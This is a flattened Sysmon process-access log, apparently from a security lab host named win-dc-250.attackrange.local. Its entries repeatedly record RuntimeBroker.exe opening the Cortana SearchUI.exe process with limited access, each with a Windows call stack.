13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011491Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011490Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011489Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011488Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011487Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011486Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011485Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011484Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011483Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011482Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011481Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011480Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011479Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011478Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011477Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011476Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011475Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011474Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011473Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 